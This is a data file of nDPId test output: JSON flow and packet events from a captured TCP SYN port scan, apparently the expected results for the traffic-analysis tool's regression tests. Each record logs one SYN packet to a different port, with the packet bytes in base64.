+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":244,"source":"synscan.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":765,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":244,"source":"synscan.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsqmkAAC8GbwmsEAAIQA2GNIzTAv3dU4MZAAAAAGACEAAljwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"synscan.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"synscan.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsJaUAACsG982sEAAIQA2GNIzTCDPdU4MZAAAAAGACEAAgWQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"synscan.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8649,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"synscan.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAs0Q0AADYGQWWsEAAIQA2GNIzTIcndU4MZAAAAAGACDAAKwwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":247,"source":"synscan.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":247,"source":"synscan.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsN7MAACsG5b+sEAAIQA2GNIzTBFfdU4MZAAAAAGACEAAkNQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"synscan.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1064,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"synscan.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsBlAAADkGCSOsEAAIQA2GNIzTBCjdU4MZAAAAAGACCAAsZAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":249,"source":"synscan.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":249,"source":"synscan.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsHiIAACwG\/lCsEAAIQA2GNIzTBEfdU4MZAAAAAGACBAAwRQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":250,"source":"synscan.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"synscan.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsYccAAC4GuKusEAAIQA2GNIzTE6ndU4MZAAAAAGACDAAY4wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":251,"source":"synscan.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"synscan.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAswmkAADEGVQmsEAAIQA2GNIzTC\/\/dU4MZAAAAAGACCAAkjQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":252,"source":"synscan.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":252,"source":"synscan.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsPAwAACwG4GasEAAIQA2GNIzTGY\/dU4MZAAAAAGACBAAa\/QAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"synscan.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":808,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"synscan.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsbAwAADAGrGasEAAIQA2GNIzTAyjdU4MZAAAAAGACBAAxZAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"synscan.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058470,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":30718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"synscan.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058470,"pkt":"ACYLMQczACWzv5HuCABFAAAsBZkAACgGGtqsEAAIQA2GNIzTd\/7dU4MZAAAAAGACBAC8jQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"synscan.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"synscan.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAs4HIAADEGNwCsEAAIQA2GNIzTBC\/dU4MZAAAAAGACCAAsXQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"synscan.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7496,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"synscan.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsfiUAACsGn02sEAAIQA2GNIzTHUjdU4MZAAAAAGACEAALRAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"synscan.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44176,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"synscan.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsjG4AAC8GjQSsEAAIQA2GNIzSrJDdUoMYAAAAAGACEAB7\/gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"synscan.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1183,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"synscan.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAs3y8AAC4GO0OsEAAIQA2GNIzSBJ\/dUoMYAAAAAGACDAAn8AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":259,"source":"synscan.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"synscan.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsOzYAADsG0jysEAAIQA2GNIzSw0\/dUoMYAAAAAGACEABlPwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"synscan.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"synscan.pcap","alias":"nDPId-test","flow_id":254,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsPfYAADQG1nysEAAIQA2GNIzSIGzdUoMYAAAAAGACBAAUIwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"synscan.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11967,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"synscan.pcap","alias":"nDPId-test","flow_id":255,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsTF8AACoG0hOsEAAIQA2GNIzSLr\/dUoMYAAAAAGACDAD9zwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"synscan.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3945,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"synscan.pcap","alias":"nDPId-test","flow_id":256,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsN1gAAC4G4xqsEAAIQA2GNIzSD2ndUoMYAAAAAGACDAAdJgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":263,"source":"synscan.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":263,"source":"synscan.pcap","alias":"nDPId-test","flow_id":257,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsXxUAACgGwV2sEAAIQA2GNIzSFTfdUoMYAAAAAGACBAAfWAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"synscan.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"synscan.pcap","alias":"nDPId-test","flow_id":258,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsT44AACYG0uSsEAAIQA2GNIzSH23dUoMYAAAAAGACDAANIgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":265,"source":"synscan.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6788,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":265,"source":"synscan.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsSeUAADYGyI2sEAAIQA2GNIzSGoTdUoMYAAAAAGACDAASCwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":266,"source":"synscan.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":266,"source":"synscan.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsjwoAADUGhGisEAAIQA2GNIzSFEbdUoMYAAAAAGACCAAcSQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":267,"source":"synscan.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058471,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":267,"source":"synscan.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058471,"pkt":"ACYLMQczACWzv5HuCABFAAAsZewAADgGqoasEAAIQA2GNIzSBDzdUoMYAAAAAGACBAAwUwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":268,"source":"synscan.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058530,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6839,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 